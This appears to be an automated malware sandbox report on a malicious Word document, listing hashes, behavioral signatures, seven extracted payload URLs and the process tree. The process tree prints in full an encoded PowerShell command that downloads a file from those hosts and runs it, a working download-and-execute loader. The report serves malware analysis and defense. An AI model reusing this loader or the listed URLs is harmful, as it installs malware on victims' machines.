Analysis
-
max time kernel
102s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/09/2024, 09:26
Static task
static1
Behavioral task
behavioral1
Sample
f5b374e081a29780965dcaec21bf4e1a_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f5b374e081a29780965dcaec21bf4e1a_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
f5b374e081a29780965dcaec21bf4e1a_JaffaCakes118.doc
-
Size
163KB
-
MD5
f5b374e081a29780965dcaec21bf4e1a
-
SHA1
d5d89f68e769ed8ae4d88c0d1c37ee84132b9ee6
-
SHA256
4ac3cd1d15cf6dae4a45f6b6bd244e27cafccc89d0cdad0d2766a17a34aeeae2
-
SHA512
e34c0a37512f783fa09cb49b05bcfc88687bbb873028952509af5dbf42c4d3f003a22a3528f6f444f5999c75d1015f2d6bcafc4fccd65a186b4cbd8626062134
-
SSDEEP
1536:KPB445TEgrO3jSWAg83tle1ZZ0293QM0eetR2cOupLB5UZ5J+a9mluNGGdywl6e:KP22TWTogk079THcpOu5UZ8luNTdT6e
Malware Config
Extracted
http://vuatritue.com/wp-admin/w/
http://castlestudios.com/bots/7/
https://www.afriqueindustries-sa.com/ootqgtbgutgqkxfq/dS9/
http://brandstrumpet-001-site1.ctempurl.com/default/lnD/
http://oneinsix.com/test/u/
http://livefarma.com/wp-content/hpu/
http://datawyse.net/cgi-bin/8/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2908 3124 POWeRsHeLL.exe 84 -
Blocklisted process makes network request 6 IoCs
flow pid Process 15 2908 POWeRsHeLL.exe 19 2908 POWeRsHeLL.exe 23 2908 POWeRsHeLL.exe 25 2908 POWeRsHeLL.exe 26 2908 POWeRsHeLL.exe 29 2908 POWeRsHeLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2748 WINWORD.EXE 2748 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2908 POWeRsHeLL.exe 2908 POWeRsHeLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2908 POWeRsHeLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2748 WINWORD.EXE 2748 WINWORD.EXE 2748 WINWORD.EXE 2748 WINWORD.EXE 2748 WINWORD.EXE 2748 WINWORD.EXE 2748 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f5b374e081a29780965dcaec21bf4e1a_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2748
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exePOWeRsHeLL -ENCOD JABIAGkAagBxAGYAZAB4AD0AKAAnAFEAcQAnACsAKAAnAGMAdAAyACcAKwAnAGwAJwApACsAJwB6ACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAGUAUgBwAHIAbwBGAGkAbABFAFwAYQAwAHgAVwBuAG4ANwBcAEIASwA3AEIAQwBGAEsAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBDAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBjAFUAUgBJAGAAVABgAFkAYABQAHIAbwB0AGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAJwAyACwAJwArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxADEALAAgAHQAbAAnACsAJwBzACcAKQApADsAJABLADYAYwB5AHkAOQBuACAAPQAgACgAKAAnAEwAJwArACcAagAzACcAKQArACgAJwBmAGYAJwArACcAegAnACkAKQA7ACQAVwA4ADYAXwAwAHUAZwA9ACgAKAAnAEcAdQAnACsAJwB2AG8AJwApACsAKAAnAHEAJwArACcAeQA5ACcAKQApADsAJABGADMAMwBhAGkAcABoAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAFEAJwArACgAJwA1ADgAJwArACcAQQAnACkAKwAoACcAMAAnACsAJwB4AHcAJwApACsAKAAnAG4AbgAnACsAJwA3ACcAKQArACgAJwBRADUAOAAnACsAJwBCAGsANwBiACcAKQArACgAJwBjAGYAawBRADUAJwArACcAOAAnACkAKQAuACIAUgBFAFAAYABMAGEAYwBlACIAKAAoACcAUQA1ACcAKwAnADgAJwApACwAWwBzAFQAcgBpAG4AZwBdAFsAYwBoAGEAcgBdADkAMgApACkAKwAkAEsANgBjAHkAeQA5AG4AKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABZAGwAcgBfADkAbABtAD0AKAAnAFQAJwArACgAJwB2ADEAJwArACcAdwA0AG4AJwApACsAJwBmACcAKQA7ACQARwB2ADgAcgBoADgAZQA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAQgBjAGwASQBFAE4AdAA7ACQAUAA2ADQAcgBvADQAMAA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAnACsAJwAvAC8AdgB1AGEAJwArACcAdAByAGkAdAAnACkAKwAoACcAdQAnACsAJwBlAC4AYwBvACcAKwAnAG0AJwApACsAKAAnAC8AdwAnACsAJwBwAC0AYQAnACkAKwAoACcAZABtAGkAbgAnACsAJwAvAHcAJwArACcALwAnACkAKwAoACcAKgBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwBjAGEAcwAnACsAJwB0AGwAZQBzACcAKQArACgAJwB0AHUAZABpACcAKwAnAG8AcwAuACcAKQArACgAJwBjACcAKwAnAG8AbQAnACkAKwAnAC8AJwArACgAJwBiAG8AJwArACcAdABzAC8ANwAvACoAaAAnACsAJwB0AHQAJwApACsAJwBwAHMAJwArACcAOgAnACsAKAAnAC8ALwB3AHcAJwArACcAdwAnACsAJwAuAGEAJwApACsAKAAnAGYAcgAnACsAJwBpAHEAJwApACsAKAAnAHUAZQAnACsAJwBpAG4AZAAnACkAKwAoACcAdQAnACsAJwBzAHQAcgAnACsAJwBpAGUAcwAnACkAKwAnAC0AJwArACgAJwBzAGEALgAnACsAJwBjACcAKwAnAG8AbQAvACcAKwAnAG8AbwB0AHEAZwB0ACcAKQArACcAYgAnACsAKAAnAGcAJwArACcAdQB0AGcAJwApACsAJwBxAGsAJwArACcAeAAnACsAKAAnAGYAcQAvAGQAUwAnACsAJwA5ACcAKQArACgAJwAvACoAJwArACcAaAB0AHQAcAA6AC8ALwBiACcAKwAnAHIAYQBuAGQAJwArACcAcwB0ACcAKQArACgAJwByAHUAJwArACcAbQBwAGUAdAAnACsAJwAtACcAKQArACgAJwAwADAAJwArACcAMQAnACkAKwAoACcALQBzAGkAJwArACcAdAAnACkAKwAnAGUAJwArACgAJwAxACcAKwAnAC4AJwArACcAYwB0AGUAbQBwAHUAJwApACsAKAAnAHIAbAAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvACcAKQArACgAJwBkACcAKwAnAGUAZgBhAHUAbAAnACsAJwB0AC8AJwArACcAbABuACcAKwAnAEQALwAqAGgAJwArACcAdAB0AHAAJwApACsAKAAnADoALwAvACcAKwAnAG8AbgBlAGkAJwArACcAbgAnACkAKwAoACcAcwBpAHgALgBjAG8AbQAvAHQAJwArACcAZQAnACsAJwBzAHQAJwApACsAKAAnAC8AJwArACcAdQAvACoAJwApACsAJwBoAHQAJwArACgAJwB0AHAAOgAnACsAJwAvAC8AbAAnACkAKwAoACcAaQB2ACcAKwAnAGUAZgBhAHIAbQAnACkAKwAoACcAYQAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtACcAKQArACgAJwBjAG8AbgB0AGUAJwArACcAbgB0AC8AaAAnACsAJwBwAHUALwAqAGgAJwArACcAdAB0AHAAOgAnACsAJwAvAC8AZABhACcAKQArACgAJwB0AGEAdwB5AHMAJwArACcAZQAuACcAKQArACgAJwBuACcAKwAnAGUAdAAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQBuAC8AOAAnACsAJwAvACcAKQApAC4AIgBzAHAATABgAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFAAOQBwAHQAawBlAHoAPQAoACcATQBmACcAKwAnADQAXwAnACsAKAAnAGYAOAAnACsAJwBqACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgA0AGkANABkADMAbAAgAGkAbgAgACQAUAA2ADQAcgBvADQAMAApAHsAdAByAHkAewAkAEcAdgA4AHIAaAA4AGUALgAiAEQAbwB3AGAATgBMAG8AYQBkAGAARgBpAEwARQAiACgAJABCADQAaQA0AGQAMwBsACwAIAAkAEYAMwAzAGEAaQBwAGgAKQA7ACQATQBxADYANQB5ADEAbgA9ACgAKAAnAE8AegBpACcAKwAnAG4ANgAnACkAKwAnAHUAcwAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQARgAzADMAYQBpAHAAaAApAC4AIgBsAEUATgBgAEcAVABIACIAIAAtAGcAZQAgADMANwA5ADkAMwApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACgAJABGADMAMwBhAGkAcABoACkAOwAkAEcANABzAGoAcAB1ADQAPQAoACcAVwAnACsAKAAnAHQANABzACcAKwAnAG4AYQAnACsAJwA1ACcAKQApADsAYgByAGUAYQBrADsAJABGAGUAbQB0AGwAeQA3AD0AKAAnAFcAMAAnACsAKAAnAHYAJwArACcANwBtACcAKQArACcAMwA4ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWAB1ADgAZAAyAGkAYwA9ACgAJwBCAGgAJwArACgAJwA0ACcAKwAnAGgAdQAnACkAKwAnAGIAaQAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize1KB
MD5fc89c325f78f3c5e6ecd32a93656a88c
SHA100bc878932eddc6cd929e5c81803325d662723cf
SHA256a82e4d9e91fa2fd15359bd0f776bec0fa1ef99492fa500bd2cd177ef2749b5cc
SHA512f265ab8b604576effcf3ccfa2924d92e20a58e02be884a583575a8f2775c49b1f953215219cd752f70055d256cfad80b30359da3e133913b513a1eeb3fadbd78